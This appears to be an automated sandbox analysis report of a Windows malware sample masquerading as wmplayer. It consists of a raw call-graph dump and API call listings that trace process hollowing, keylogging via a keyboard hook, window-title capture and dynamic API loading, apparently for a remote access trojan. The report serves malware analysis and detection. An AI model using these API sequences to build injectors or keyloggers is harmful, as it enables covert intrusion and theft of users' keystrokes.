__Tolower 53278->53295 53282 439a32 53279->53282 53296 43a4f1 26 API calls 2 library calls 53279->53296 53297 43a4f1 26 API calls 2 library calls 53282->53297 53283 439af9 _strftime 53283->53269 53298 445354 20 API calls _Atexit 53283->53298 53286 43a54a 53285->53286 53287 43a55d 53285->53287 53299 445354 20 API calls _Atexit 53286->53299 53287->53271 53289 43a54f 53300 43a827 26 API calls _Deallocate 53289->53300 53291 43a55a 53291->53271 53292->53275 53293->53269 53294->53278 53295->53278 53296->53282 53297->53283 53298->53269 53299->53289 53300->53291 53305 401e9b 53301->53305 53303 4027d9 53303->52939 53304->52943 53306 401ea7 53305->53306 53307 40245c 28 API calls 53306->53307 53308 401eb9 53307->53308 53308->53303 53310 409855 53309->53310 53311 4124b7 3 API calls 53310->53311 53312 40985c 53311->53312 53313 409870 53312->53313 53314 40988a 53312->53314 53316 4095cf 53313->53316 53317 409875 53313->53317 53328 4082dc 53314->53328 53316->52693 53318 4082dc 28 API calls 53317->53318 53320 409883 53318->53320 53354 409959 29 API calls 53320->53354 53323 409888 53323->53316 53324->52967 53507 402d8b 53325->53507 53327 4028dd 53327->52971 53329 4082eb 53328->53329 53355 408431 53329->53355 53331 408309 53332 4098a5 53331->53332 53360 40affa 53332->53360 53335 4098f6 53337 401f66 28 API calls 53335->53337 53336 4098ce 53338 401f66 28 API calls 53336->53338 53339 409901 53337->53339 53340 4098d8 53338->53340 53342 401f66 28 API calls 53339->53342 53341 41ae08 28 API calls 53340->53341 53343 4098e6 53341->53343 53344 409910 53342->53344 53364 40a876 31 API calls _Yarn 53343->53364 53346 41a686 79 API calls 53344->53346 53348 409915 CreateThread 53346->53348 53347 4098ed 53349 401eea 26 API calls 53347->53349 53350 409930 CreateThread 53348->53350 53351 40993c CreateThread 53348->53351 53376 4099a9 53348->53376 53349->53335 53350->53351 53373 409993 53350->53373 53352 401e13 26 API calls 53351->53352 53370 4099b5 53351->53370 53353 409950 53352->53353 53353->53316 
53354->53323 53506 40999f 136 API calls 53354->53506 53356 40843d 53355->53356 53358 40845b 53356->53358 53359 402f0d 28 API calls 53356->53359 53358->53331 53359->53358 53362 40b006 53360->53362 53361 4098c3 53361->53335 53361->53336 53362->53361 53365 403b9e 53362->53365 53364->53347 53366 403ba8 53365->53366 53368 403bb3 53366->53368 53369 403cfd 28 API calls 53366->53369 53368->53361 53369->53368 53379 40a3f4 53370->53379 53428 4099e4 53373->53428 53449 409e48 53376->53449 53407 40a402 53379->53407 53380 4099be 53381 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 53382 40b027 28 API calls 53381->53382 53382->53407 53385 41aca0 GetLastInputInfo GetTickCount 53385->53407 53387 40a4a2 GetWindowTextW 53387->53407 53389 401e13 26 API calls 53389->53407 53390 40a5ff 53392 401e13 26 API calls 53390->53392 53391 40affa 28 API calls 53391->53407 53392->53380 53393 40a569 Sleep 53393->53407 53396 401f66 28 API calls 53396->53407 53397 40a4f1 53399 4082dc 28 API calls 53397->53399 53397->53407 53412 40a876 31 API calls _Yarn 53397->53412 53399->53397 53401 405ce6 28 API calls 53401->53407 53403 4028cf 28 API calls 53403->53407 53404 41ae08 28 API calls 53404->53407 53405 409d58 27 API calls 53405->53407 53406 401eea 26 API calls 53406->53407 53407->53380 53407->53381 53407->53385 53407->53387 53407->53389 53407->53390 53407->53391 53407->53393 53407->53396 53407->53397 53407->53401 53407->53403 53407->53404 53407->53405 53407->53406 53408 433519 5 API calls __Init_thread_wait 53407->53408 53409 4338a5 29 API calls __onexit 53407->53409 53410 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 53407->53410 53411 4082a8 28 API calls 53407->53411 53413 40b0dd 28 API calls 53407->53413 53414 40ae58 44 API calls 2 library calls 53407->53414 53415 440c51 53407->53415 53419 404c9e 28 API calls 53407->53419 53408->53407 53409->53407 53410->53407 53411->53407 53412->53397 53413->53407 53414->53407 53416 440c5d 53415->53416 53420 440a4d 53416->53420 
53419->53407 53421 440a64 53420->53421 53425 440aa5 53421->53425 53426 445354 20 API calls _Atexit 53421->53426 53423 440a9b 53427 43a827 26 API calls _Deallocate 53423->53427 53425->53407 53426->53423 53427->53425 53429 409a63 GetMessageA 53428->53429 53430 4099ff GetModuleHandleA SetWindowsHookExA 53428->53430 53431 409a75 TranslateMessage DispatchMessageA 53429->53431 53442 40999c 53429->53442 53430->53429 53432 409a1b GetLastError 53430->53432 53431->53429 53431->53442 53443 41ad46 53432->53443 53436 409a3e 53437 401f66 28 API calls 53436->53437 53438 409a4d 53437->53438 53439 41a686 79 API calls 53438->53439 53440 409a52 53439->53440 53441 401eea 26 API calls 53440->53441 53441->53442 53444 440c51 26 API calls 53443->53444 53445 41ad67 53444->53445 53446 401f66 28 API calls 53445->53446 53447 409a31 53446->53447 53448 404c9e 28 API calls 53447->53448 53448->53436 53450 409e5d Sleep 53449->53450 53469 409d97 53450->53469 53452 4099b2 53453 409e9d CreateDirectoryW 53457 409e6f 53453->53457 53454 409eae GetFileAttributesW 53454->53457 53455 409ec5 SetFileAttributesW 53455->53457 53457->53450 53457->53452 53457->53453 53457->53454 53457->53455 53459 401d64 28 API calls 53457->53459 53462 409f10 53457->53462 53482 41b58f 53457->53482 53458 409f3f PathFileExistsW 53458->53462 53459->53457 53461 401f86 28 API calls 53461->53462 53462->53458 53462->53461 53463 40a048 SetFileAttributesW 53462->53463 53464 406052 28 API calls 53462->53464 53465 401eef 26 API calls 53462->53465 53467 401eea 26 API calls 53462->53467 53468 401eea 26 API calls 53462->53468 53491 41b61a CreateFileW 53462->53491 53499 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 53462->53499 53463->53457 53464->53462 53465->53462 53467->53462 53468->53457 53470 409e44 53469->53470 53472 409dad 53469->53472 53470->53457 53471 409dcc CreateFileW 53471->53472 53473 409dda GetFileSize 53471->53473 53472->53471 53474 409e0f CloseHandle 53472->53474 53475 409e21 53472->53475 53476 409e04 Sleep 
53472->53476 53477 409dfd 53472->53477 53473->53472 53473->53474 53474->53472 53475->53470 53479 4082dc 28 API calls 53475->53479 53476->53474 53500 40a7f0 83 API calls 53477->53500 53480 409e3d 53479->53480 53481 4098a5 127 API calls 53480->53481 53481->53470 53483 41b5a2 CreateFileW 53482->53483 53485 41b5db 53483->53485 53486 41b5df 53483->53486 53485->53457 53487 41b5f6 WriteFile 53486->53487 53488 41b5e6 SetFilePointer 53486->53488 53489 41b60b CloseHandle 53487->53489 53490 41b609 53487->53490 53488->53487 53488->53489 53489->53485 53490->53489 53492 41b640 53491->53492 53493 41b644 GetFileSize 53491->53493 53492->53462 53501 401e65 53493->53501 53495 41b658 53496 41b66a ReadFile 53495->53496 53497 41b677 53496->53497 53498 41b679 CloseHandle 53496->53498 53497->53498 53498->53492 53499->53462 53500->53476 53502 401e6d 53501->53502 53504 401e77 53502->53504 53505 4023b7 28 API calls 53502->53505 53504->53495 53505->53504 53508 402d97 53507->53508 53511 4030f7 53508->53511 53510 402dab 53510->53327 53512 403101 53511->53512 53514 403115 53512->53514 53515 4036c2 28 API calls 53512->53515 53514->53510 53515->53514 53517 403b48 53516->53517 53523 403b7a 53517->53523 53520 403cbb 53527 403dc2 53520->53527 53522 403cc9 53522->52980 53524 403b86 53523->53524 53525 403b9e 28 API calls 53524->53525 53526 403b5a 53525->53526 53526->53520 53528 403dce 53527->53528 53531 402ffd 53528->53531 53530 403de3 53530->53522 53532 40300e 53531->53532 53533 4032a4 28 API calls 53532->53533 53534 40301a 53533->53534 53536 40302e 53534->53536 53537 4035e8 28 API calls 53534->53537 53536->53530 53537->53536 53544 4395ba 53538->53544 53542 412814 53541->53542 53543 4127ed RegSetValueExA RegCloseKey 53541->53543 53542->53006 53543->53542 53547 43953b 53544->53547 53546 401608 53546->53004 53548 43954a 53547->53548 53549 43955e 53547->53549 53555 445354 20 API calls _Atexit 53548->53555 53553 43955a __alldvrm 53549->53553 53557 447601 11 API calls 2 library calls 53549->53557 53552 
43954f 53556 43a827 26 API calls _Deallocate 53552->53556 53553->53546 53555->53552 53556->53553 53557->53553 53559 41aab9 ctype ___scrt_fastfail 53558->53559 53560 401f66 28 API calls 53559->53560 53561 41ab2e 53560->53561 53561->53010 53562->53026 53564 413fb3 WSASetLastError 53563->53564 53565 413fa9 53563->53565 53564->53091 53711 413e37 35 API calls ___std_exception_copy 53565->53711 53567 413fae 53567->53564 53570 404206 socket 53569->53570 53571 4041fd 53569->53571 53572 404220 53570->53572 53573 404224 CreateEventW 53570->53573 53712 404262 WSAStartup 53571->53712 53572->53091 53573->53091 53575 404202 53575->53570 53575->53572 53577 4049b1 53576->53577 53578 40492a 53576->53578 53577->53091 53579 404933 53578->53579 53580 404987 CreateEventA CreateThread 53578->53580 53581 404942 GetLocalTime 53578->53581 53579->53580 53580->53577 53714 404b1d 53580->53714 53582 41ad46 28 API calls 53581->53582 53583 40495b 53582->53583 53713 404c9e 28 API calls 53583->53713 53585 404968 53586 401f66 28 API calls 53585->53586 53587 404977 53586->53587 53588 41a686 79 API calls 53587->53588 53589 40497c 53588->53589 53590 401eea 26 API calls 53589->53590 53590->53580 53592 4043e1 53591->53592 53593 4042b3 53591->53593 53594 404343 53592->53594 53595 4043e7 WSAGetLastError 53592->53595 53593->53594 53596 4042e8 53593->53596 53599 404cbf 28 API calls 53593->53599 53594->53091 53595->53594 53597 4043f7 53595->53597 53718 420151 27 API calls 53596->53718 53600 4042f7 53597->53600 53601 4043fc 53597->53601 53603 4042d4 53599->53603 53607 401f66 28 API calls 53600->53607 53723 41bc76 30 API calls 53601->53723 53602 4042f0 53602->53600 53606 404306 53602->53606 53608 401f66 28 API calls 53603->53608 53605 40440b 53724 404c9e 28 API calls 53605->53724 53616 404315 53606->53616 53617 40434c 53606->53617 53610 404448 53607->53610 53611 4042e3 53608->53611 53614 401f66 28 API calls 53610->53614 53612 41a686 79 API calls 53611->53612 53612->53596 53613 404418 53615 401f66 28 API calls 
53613->53615 53618 404457 53614->53618 53619 404427 53615->53619 53621 401f66 28 API calls 53616->53621 53720 420f34 56 API calls 53617->53720 53622 41a686 79 API calls 53618->53622 53623 41a686 79 API calls 53619->53623 53625 404324 53621->53625 53622->53594 53626 40442c 53623->53626 53624 404354 53627 404389 53624->53627 53628 404359 53624->53628 53629 401f66 28 API calls 53625->53629 53631 401eea 26 API calls 53626->53631 53722 4202ea 28 API calls 53627->53722 53632 401f66 28 API calls 53628->53632 53633 404333 53629->53633 53631->53594 53635 404368 53632->53635 53636 41a686 79 API calls 53633->53636 53634 404391 53637 4043be CreateEventW CreateEventW 53634->53637 53640 401f66 28 API calls 53634->53640 53638 401f66 28 API calls 53635->53638 53639 404338 53636->53639 53637->53594 53641 404377 53638->53641 53719 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53639->53719 53643 4043a7 53640->53643 53644 41a686 79 API calls 53641->53644 53645 401f66 28 API calls 53643->53645 53646 40437c 53644->53646 53647 4043b6 53645->53647 53721 420592 54 API calls 53646->53721 53649 41a686 79 API calls 53647->53649 53650 4043bb 53649->53650 53650->53637 53725 41a945 GlobalMemoryStatusEx 53651->53725 53653 41a982 53653->53091 53726 413646 53654->53726 53658 40cc0d 53657->53658 53659 41246e 3 API calls 53658->53659 53661 40cc14 53659->53661 53660 40cc2c 53660->53091 53661->53660 53662 4124b7 3 API calls 53661->53662 53662->53660 53664 401f86 28 API calls 53663->53664 53665 41ae03 53664->53665 53665->53091 53666->53091 53668 436050 ___scrt_fastfail 53667->53668 53669 41ac71 GetForegroundWindow GetWindowTextW 53668->53669 53670 403b40 28 API calls 53669->53670 53671 41ac9b 53670->53671 53671->53091 53673 401f66 28 API calls 53672->53673 53674 40e69e 53673->53674 53674->53091 53676 4027f8 53675->53676 53677 402e78 28 API calls 53676->53677 53678 402814 53677->53678 53678->53091 53682 4045ec 53679->53682 53680 43a88c _Yarn 21 API calls 53680->53682 53682->53680 
53683 401f86 28 API calls 53682->53683 53684 401eef 26 API calls 53682->53684 53685 404666 53682->53685 53688 401eea 26 API calls 53682->53688 53767 40455b 53682->53767 53773 404688 53682->53773 53683->53682 53684->53682 53686 4047eb 98 API calls 53685->53686 53687 40466d 53686->53687 53689 401eea 26 API calls 53687->53689 53688->53682 53690 404676 53689->53690 53691 401eea 26 API calls 53690->53691 53692 40467f 53691->53692 53692->53091 53694->53091 53695->53091 53696->53091 53697->53091 53699 404805 SetEvent CloseHandle 53698->53699 53700 40481c closesocket 53698->53700 53701 40489c 53699->53701 53702 404829 53700->53702 53701->53091 53703 40483f 53702->53703 54173 404ab1 83 API calls 53702->54173 53705 404851 WaitForSingleObject 53703->53705 53706 404892 SetEvent CloseHandle 53703->53706 54174 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53705->54174 53706->53701 53708 404860 SetEvent WaitForSingleObject 54175 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53708->54175 53710 404878 SetEvent CloseHandle CloseHandle 53710->53706 53711->53567 53712->53575 53713->53585 53717 404b29 101 API calls 53714->53717 53716 404b26 53717->53716 53718->53602 53719->53594 53720->53624 53721->53639 53722->53634 53723->53605 53724->53613 53725->53653 53729 413619 53726->53729 53730 41362e ___scrt_initialize_default_local_stdio_options 53729->53730 53733 43e2dd 53730->53733 53736 43b030 53733->53736 53737 43b070 53736->53737 53738 43b058 53736->53738 53737->53738 53740 43b078 53737->53740 53760 445354 20 API calls _Atexit 53738->53760 53762 4392de 38 API calls 3 library calls 53740->53762 53741 43b05d 53761 43a827 26 API calls _Deallocate 53741->53761 53744 43b088 53763 43b7b6 20 API calls 2 library calls 53744->53763 53747 43b100 53764 43be24 50 API calls 3 library calls 53747->53764 53748 41363c 53748->53091 53751 43b068 53753 433d2c 53751->53753 53752 43b10b 53765 43b820 20 API calls _free 53752->53765 53754 433d37 

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                            • API String ID: 384173800-625181639
                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                            • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                            • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                            • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                            • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                            • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
                                                                                            • NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
                                                                                            • NtClose.NTDLL(?), ref: 0041744A
                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                            • NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                            • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                            • NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
                                                                                            • NtClose.NTDLL(?), ref: 004175B6
                                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                            • GetLastError.KERNEL32 ref: 004175C7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                            • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                            • API String ID: 3150337530-3035715614
                                                                                            • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                            • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                            • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                            • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                            Strings
                                                                                            • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                            • String ID: Keylogger initialization failure: error
                                                                                            • API String ID: 3219506041-952744263
                                                                                            • Opcode ID: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                            • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                            • Opcode Fuzzy Hash: 91335a55c3984906f4204fa13c6684ea5e31caf25f4e31ed5d45cd88cf3ea6e7
                                                                                            • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                            • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                            • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 1083526818-0
                                                                                            • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                            • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                            • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                            • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                            • API String ID: 2281282204-3981147832
                                                                                            • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                            • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                            • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                            • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF
                                                                                            APIs
                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                            Memory Dump Source
